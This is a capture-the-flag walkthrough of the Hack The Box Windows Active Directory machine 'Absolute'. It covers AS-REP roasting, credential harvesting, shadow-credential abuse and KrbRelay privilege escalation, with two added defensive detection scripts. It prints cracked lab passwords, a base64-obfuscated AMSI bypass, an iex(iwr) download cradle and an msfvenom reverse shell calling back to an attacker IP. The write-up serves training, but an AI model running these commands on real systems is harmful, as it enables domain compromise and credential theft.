# HTB - Absolute

<figure><img src="/files/hEYBoO6YhSEIH2HZzdoL" alt=""><figcaption></figcaption></figure>

## Description

***

Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn't require Pre-authentication, therefore posing a valuable target for an `ASREP` roast attack. The discovered credentials are then used to enumerate `LDAP` and discover credentials for the user `svc_smb`, who has access to an `SMB` share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an `LDAP` connection to the Domain Controller with clear text credentials for the `m.lovegod` user, who owns the `Network Audit` group, which in turn has `Generic Write` over the `winrm_user`. Following this attack path and performing a shadow credential attack on the `winrm_user`, one can then `WinRM` and access the machine. Finally, the `KrbRelay` tool is used to add the `winrm_user` user to the Administrators group, leading to fully elevated privileges.

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-01 18:41:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: 2024-11-01T18:42:29
|_  start_date: N/A
```

**Summary**

```R
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - LDAP - LDAPS - winRM - SMB
* Important notes: DNS:dc.absolute.htb - Domain: absolute.htb - IIS httpd 10.0
```

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $sudo sh -c "echo  '$ip dc dc.absolute.htb absolute.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $tail -n 1 /etc/hosts
10.10.11.181 dc dc.absolute.htb absolute.htb
```

**Service Enumeration**

I will start this box differently by enumerating the HTTP service first.

**HTTP Enumeration**

{% embed url="<http://absolute.htb/>" %}

<figure><img src="/files/GftkPsg1Bl4GCZP6IYFe" alt=""><figcaption></figcaption></figure>

I didn't find anything in the webapp, so I tried to fuzz it, but there was nothing interesting here, only a few common directories.

<figure><img src="/files/1PcLtPXMBzc6SMY7Lbi6" alt=""><figcaption></figcaption></figure>

There are several images here, you can switch between them using the arrows.

<figure><img src="/files/g6aaCWbDMmDLiAoOcM3x" alt=""><figcaption></figcaption></figure>

If I look at the page code I will see their locations and names.

<figure><img src="/files/hXelbtdtfZDJp9xcWbiD" alt=""><figcaption></figcaption></figure>

When I visit the images directory at `http://absolute.htb/images/`, I get `Access denied`.

<figure><img src="/files/MhpAYnIdSRIBnkl4dWxh" alt=""><figcaption></figcaption></figure>

I will switch now to my terminal to download each image

```bash
for i in {1..6};do wget -q http://absolute.htb/images/hero_$i.jpg;done
```

<figure><img src="/files/xQAgGeQ6Lezv9XduBerc" alt=""><figcaption></figcaption></figure>

Looking at the image metadata, I see `author` and `artist` fields containing names.

<figure><img src="/files/ZZuibEG7BpIA1tmshc8R" alt=""><figcaption></figcaption></figure>

I can use these names to create a wordlist and check for valid domain accounts

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $for image in $(ls); do exiftool $image | grep -i "Artist\|Author" | cut -d: -f2 | sort -u | tee -a users.txt;done

 James Roberts
 Michael Chaffrey
 Donald Klay
 Sarah Osvald
 Jeffer Robinson
 Nicole Smith
```

Then, I will mutate these names to create possible combinations of them.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $/opt/tools/username-anarchy/username-anarchy -i users.txt > users.lst
```

Brute-forcing Kerberos to find valid users:

```bash
kerbrute userenum -d absolute --dc dc.absolute.htb wordlists/users.lst -o wordlists/valid_users.lst
```

<figure><img src="/files/lb0QA6GxxHC8zJX1AXQx" alt=""><figcaption></figcaption></figure>

```R
j.roberts
m.chaffrey
s.osvald
d.klay
j.robinson
n.smith
```

## Foothold

***

With this wordlist, I can move on to attempt an `ASREPRoasting` attack.

```bash
nxc ldap dc -u valid_domain_users.lst -p '' -d absolute.htb --asreproast asrep.hashes
```

<figure><img src="/files/Se0vxKnCplJ1aDLqFE7d" alt=""><figcaption></figcaption></figure>

The hash is cracked successfully :))

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $hashcat -m 18200 hashes/asrep.hashes /usr/share/wordlists/rockyou.txt 

..snip..
$krb5asrep$23$d.klay@ABSOLUTE.HTB:19d6d35c374ae22b5c9f38860c1eddf5$ba7a42c258f10291c22324fc98d8618deaf7e325d2a47ceea3ad7367cef4391c8f6c4cfb40b7e82785064bf952da2929213555bbe13b7d2edb0c4dc7da0b5496d8115c53535866328272d61f004106a834f03e176701302e51accb139155d1b7ba5311b82407d515a2cbd3e713176cdfde686d2fd6bf9e37e13f16d629dd607965638f16fe9795bf756449e36cecf3ed2b557c169bcee012d77bd904631e665a3f89f2737650fa4b6279fc9956c48ab55b20feff7531e2a66896b939fc6d4c25ded4c217a64f10d3cc97c1551a7b33b7bdabeb23e978e09c39ca101d180636a126d6419cea3a8661e32b117a:Darkmoonsky248girl

Session..........: hashcat
Status...........: Cracked
```

Now, I will make a to-do list so I don't forget anything in the `Enumeration` phase:

* Check SMB shares access
* Collect domain info with `bloodhound.py`
* Collect LDAP data with `ldapdomaindump`
* Check for `winRM` access using `bloodhound` query
* Check for ADCS existence
* Check for common CVE `GoldenPac`, `Petitpotam`
* Check for LDAP signing for possible NTLM relay attack
* Check for password reuse

```bash
nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -M spider_plus
```

This error message means NTLM authentication is disabled, so I need to use Kerberos authentication instead.

<figure><img src="/files/2SITBu8pUK0b7hbvYa5F" alt=""><figcaption></figcaption></figure>

I don't have permission to the interesting share folder, so I will move forward.

<figure><img src="/files/YHDZbGD7xgy8WG2OBuWb" alt=""><figcaption></figcaption></figure>

I can't use `ldapdomaindump` since NTLM authentication is disabled, but `bloodhound.py` is smart enough to switch to Kerberos authentication automatically.

```bash
─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $bloodhound-python -u 'd.klay' -p 'Darkmoonsky248girl' -ns 10.10.11.181 -d absolute.htb -c all                                                                                           
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Done in 420M 45S
```

PKI exists on the domain

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M adcs -k

LDAP        dc              389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
ADCS        dc              389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        dc              389    DC               Found PKI Enrollment Server: dc.absolute.htb
ADCS        dc              389    DC               Found CN: absolute-DC-CA
```

The target is not vulnerable to `noPac`, but it is to `petitpotam`. I will note it down; maybe I will need it later.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M nopac

SMB         dc              445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
NOPAC       dc              445    DC               TGT with PAC size 1556
NOPAC       dc              445    DC               TGT without PAC size 1556

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M petitpotam

SMB         dc              445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
PETITPOTAM  dc              445    DC               VULNERABLE
PETITPOTAM  dc              445    DC               Next step: https://github.com/topotam/PetitPotam

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M ldap-checker -k

LDAP        dc              389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
LDAP-CHE... dc              389    DC               LDAP Signing NOT Enforced!
LDAP-CHE... dc              389    DC               LDAPS Channel Binding is set to "NEVER"
```

I don't have winRM access to the box, either.

<figure><img src="/files/kY0Qw8T6zPCuHHL2OkEj" alt=""><figcaption></figcaption></figure>

I want to get all the users in the domain, so I will use `NetExec` to get them, and luckily I got a user's credentials from the description field.

<figure><img src="/files/2b0NTpQXBRrQHeLNibV3" alt=""><figcaption></figcaption></figure>

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'svc_smb' -p 'AbsoluteSMBService123!' -k

LDAP    dc    389    DC      [+] absolute.htb\svc_smb:AbsoluteSMBService123! 
```
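Both footholds so far come from account attributes that a defender can audit: the "do not require Kerberos pre-authentication" flag that made `d.klay` roastable, and a password left in a `description` field. The following is an added example, not part of the original write-up, that checks an LDIF export of user objects for both conditions. The account names, the sample export and the secret-detection heuristic are constructed assumptions; folded LDIF lines are not handled.

```python
import base64
import re

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"
KEYWORDS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.I)
CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")

def parse_ldif(text):
    """Yield one dict per LDIF entry; handles the 'attr:: <base64>' value form."""
    for block in text.strip().split("\n\n"):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if not sep:
                continue
            if key.endswith(":"):
                key, value = key[:-1], base64.b64decode(value).decode("utf-8", "replace")
            rec[key] = value
        if "sAMAccountName" in rec:
            yield rec

def looks_like_secret(token):
    """Heuristic (assumption): 8+ characters drawn from at least three character classes."""
    return len(token) >= 8 and sum(bool(re.search(c, token)) for c in CHAR_CLASSES) >= 3

def audit_accounts(records):
    """Return (account, finding) pairs for roastable accounts and secret-like descriptions."""
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        uac = int(rec.get("userAccountControl", "0"))
        # A disabled account cannot be issued an AS-REP, so it is not reported here.
        if uac & UF_DONT_REQUIRE_PREAUTH and not (uac & UF_ACCOUNTDISABLE):
            findings.append((name, "preauth-not-required"))
        desc = rec.get("description", "")
        if KEYWORDS.search(desc) or any(looks_like_secret(t) for t in desc.split()):
            findings.append((name, "secret-like-description"))
    return findings

# Constructed sample export (example.test domain, invented accounts).
SAMPLE_LDIF = """\
dn: CN=A Example,CN=Users,DC=example,DC=test
sAMAccountName: a.example
userAccountControl: 512
description: Help desk analyst

dn: CN=B Example,CN=Users,DC=example,DC=test
sAMAccountName: b.example
userAccountControl: 4194816

dn: CN=svc_example,CN=Users,DC=example,DC=test
sAMAccountName: svc_example
userAccountControl: 66048
description: SMB service account, initial login Example-Secret-123

dn: CN=Old Example,CN=Users,DC=example,DC=test
sAMAccountName: old.example
userAccountControl: 4194818
description: Left the company
"""

if __name__ == "__main__":
    for account, finding in audit_accounts(parse_ldif(SAMPLE_LDIF)):
        print(f"{account}: {finding}")
```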

With the two passwords I have, I will try password spraying against the users I just found.

```R
AbsoluteSMBService123!
Darkmoonsky248girl
```

Unfortunately, I didn't get any additional accounts.

<figure><img src="/files/Ams9abzxKT9k9ZDWN3C7" alt=""><figcaption></figcaption></figure>

Checking the shares with the new user credential reveals that I have `READ` access on the `Shared` folder.

<figure><img src="/files/XtrIGeoUfynzVtwHWKpW" alt=""><figcaption></figcaption></figure>

There are only 2 files in the share folder: `compiler.sh` and `test.exe`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/dc.json
{
    "NETLOGON": {},
    "SYSVOL": {},
    "Shared": {
        "compiler.sh": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 09:20:32",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "72 B"
        },
        "test.exe": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 00:13:07",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "66 KB"
        }
    }
}
```

Connect to the shared folder and download the files after getting a Kerberos ticket for easy access.

```bash
kinit svc_smb
impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass
```

<figure><img src="/files/fTDppXvSPJzCY8LH763v" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/63bblw6Ig0OxsyuMlc6z" alt=""><figcaption></figcaption></figure>

## Lateral Movement

***

I will switch now to a Windows VM to run this program or decompile it with `dnSpy`.

When I run the file while Wireshark captures the network traffic, several DNS queries show up.

<figure><img src="/files/QYxran3EmJSPSR5USYi9" alt=""><figcaption></figcaption></figure>

It tries to resolve `_ldap._tcp.dc.absolute.htb`

<figure><img src="/files/9xdblIBPRuN2P6F50zOJ" alt=""><figcaption></figcaption></figure>

I will try the machine's IP `10.10.11.182` and run the program again

> Make sure you are connected to the HTB network with the `.ovpn` file. I was using the `OpenVPN GUI` client.

<figure><img src="/files/piwmVy3aFGCaNrreSNIx" alt=""><figcaption></figcaption></figure>

It performs `ldap binding`

<figure><img src="/files/eMxcGICkzc6lLp2hXYaU" alt=""><figcaption></figcaption></figure>

Here are the credentials it sends over the network: `mlovegod:AbsoluteLDAP2022!`

<figure><img src="/files/uZpBIedieF2K0Ar7QmUb" alt=""><figcaption></figcaption></figure>

There isn't a user named `mlovegod`, but there is `m.lovegod`.

<figure><img src="/files/zO9JXks0nQgHmVX6t5ZR" alt=""><figcaption></figcaption></figure>

He `Owns` the `Network Audit` group.

<figure><img src="/files/L4xpHfxcX74cBVgWVL9d" alt=""><figcaption></figcaption></figure>

The `Svc_audit` user is a member of `network audit` and has `GenericWrite` over `winrm_user`.

<figure><img src="/files/iyYnrWlcauKjlbu8eSrx" alt=""><figcaption></figcaption></figure>

Only this user, `winrm_user`, can access the machine via `winRM`.

<figure><img src="/files/dJeuMjwXZAaKbzYDebdp" alt=""><figcaption></figcaption></figure>

So the attack path is:

1. Abuse ownership of the `Network Audit` group to give myself `GenericAll` rights
2. Add myself to this group and gain its privileges
3. Abuse `GenericWrite` to add shadow credentials or change the password of `winrm_user`
4. Access the machine using `winrm_user`

```bash
./bloodyAD -u m.lovegod -p 'AbsoluteLDAP2022!' -d absolute.htb --dc-ip 10.10.11.181 -k --host dc.absolute.htb add genericAll "CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB" m.lovegod
```

<figure><img src="/files/AeJerTPB9GW11FyUMwx7" alt=""><figcaption></figcaption></figure>

```bash
python3 powerview.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
# Typed inside the powerview.py interactive shell:
Add-DomainGroupMember -Identity "Network audit" -Members m.lovegod
```

<figure><img src="/files/b3yIKgyU3mrbNznWL7fy" alt=""><figcaption></figcaption></figure>

```bash
kinit m.lovegod
KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Or:
python3 pywhisker.py -d absolute.htb -u m.lovegod -p 'AbsoluteLDAP2022!' --target winrm_user --action add -k
python3 gettgtpkinit.py -cert-pfx file.pfx -pfx-pass <pass> absolute.htb/winrm_user winrm.ccache
KRB5CCNAME=winrm.ccache python3 getnthash.py -key <aes256_key> absolute.htb/winrm_user
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb

..snip..
[*] Adding Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
```
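The `certipy` output above shows a Key Credential being added to `winrm_user` and removed again seconds later, which is visible to a defender as a pair of Security event 5136 records for the `msDS-KeyCredentialLink` attribute. The following is an added example, not part of the original write-up, that flags such writes from already-parsed events. It assumes directory-service change auditing (a SACL) is enabled on user objects; the events, account names and the allow-listed sync account are constructed.

```python
from datetime import datetime, timedelta

# Event 5136 = "A directory service object was modified".
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"
KEY_ATTR = "msds-keycredentiallink"

def detect_key_credential_writes(events, allowed_writers=(), window=timedelta(minutes=5)):
    """Return (rule, writer, object_dn) alerts for suspicious key-credential changes."""
    allowed = {w.lower() for w in allowed_writers}
    alerts, last_add = [], {}
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["TimeCreated"])):
        if ev["EventID"] != 5136 or ev["AttributeLDAPDisplayName"].lower() != KEY_ATTR:
            continue
        writer = ev["SubjectUserName"].lower()
        if writer in allowed:
            continue  # accounts expected to provision keys (assumption: site-specific list)
        ts = datetime.fromisoformat(ev["TimeCreated"])
        key = (writer, ev["ObjectDN"].lower())
        if ev["OperationType"] == VALUE_ADDED:
            last_add[key] = ts
            alerts.append(("key-credential-added", writer, ev["ObjectDN"]))
        elif ev["OperationType"] == VALUE_DELETED:
            added = last_add.pop(key, None)
            # An add that is undone by the same writer shortly after is a stronger signal.
            if added is not None and ts - added <= window:
                alerts.append(("added-then-removed", writer, ev["ObjectDN"]))
    return alerts

# Constructed sample events (example.test domain, invented accounts).
TARGET_DN = "CN=Target Example,CN=Users,DC=example,DC=test"

def _ev(time, writer, attr, op, dn=TARGET_DN):
    return {"EventID": 5136, "TimeCreated": time, "SubjectUserName": writer,
            "ObjectDN": dn, "AttributeLDAPDisplayName": attr, "OperationType": op}

SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-01-01T09:59:00", "SubjectUserName": "helpdesk.example"},
    _ev("2024-01-01T10:00:00", "helpdesk.example", "msDS-KeyCredentialLink", VALUE_ADDED),
    _ev("2024-01-01T10:00:05", "helpdesk.example", "description", VALUE_ADDED),
    _ev("2024-01-01T10:00:07", "helpdesk.example", "msDS-KeyCredentialLink", VALUE_DELETED),
    _ev("2024-01-01T10:30:00", "sync.example", "msDS-KeyCredentialLink", VALUE_ADDED,
        dn="CN=Other Example,CN=Users,DC=example,DC=test"),
]

if __name__ == "__main__":
    for alert in detect_key_credential_writes(SAMPLE_EVENTS, allowed_writers=["sync.example"]):
        print(alert)
```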

```powershell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $KRB5CCNAME=`pwd`/winrm_user.ccache evil-winrm -i dc -r absolute.htb

*Evil-WinRM* PS C:\Users\winrm_user\Documents> type ..\Desktop\user.txt
18dcdc1a7cf18d75167fbebf08f483b5
```

> User Flag: 18dcdc1a7cf18d75167fbebf08f483b5

## Privilege Escalation

***

After getting access to the machine, I want to upgrade my shell to a persistent one. I will use `meterpreter` because I'm comfortable with it.

```powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.12 lport=9001 -f psh -o shell.ps1

[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

iex(iwr -UseBasicParsing 10.10.16.12/shell.ps1)
```

```bash
┌─[kali@parrot]─[~/tools]
└──╼ $ sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.12;set lport 9001;set payload windows/x64/meterpreter/reverse_tcp; run'

[*] Started reverse TCP handler on 0.0.0.0:9001 
[*] Sending stage (200774 bytes) to 10.10.11.181
[*] Meterpreter session 1 opened (10.10.16.12:9001 -> 10.10.11.181:58987) at 2024-11-02 02:08:21 -0400

(Meterpreter 1)(C:\Windows\system32) > 
```

Since I found that `ldap signing is disabled` at the beginning, I can perform relaying against it with my access to the machine.

I will use this repo:

{% embed url="<https://github.com/cube0x0/KrbRelay>" %}

Following the repo, I can use several options here

<figure><img src="/files/LvZ4wc4VnhbDBmFZDb1B" alt=""><figcaption></figcaption></figure>

CLSID of Windows 2019

<figure><img src="/files/8BKQ4tbpUazNOKNYvSDv" alt=""><figcaption></figcaption></figure>

First, we need to get the port number that allows `SYSTEM`

```POWERSHELL
.\CheckPort.exe

..snip..
[*] SYSTEM Is allowed through port 10
```

I need to run the exploit in different logon types: 2 or 9

```bash
.\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 'KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10'

.\RunasCs.exe d.klay Darkmoonsky248girl -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -add-groupmember administrators winrm_user"
```

<figure><img src="/files/PAbSprLX5oytWK6Nl1dS" alt=""><figcaption></figcaption></figure>

```bash
PS C:\Users\Administrator\Desktop> type root.txt
```

> Root Flag: adce565cxxxxxxxxxxxxxxxxxx


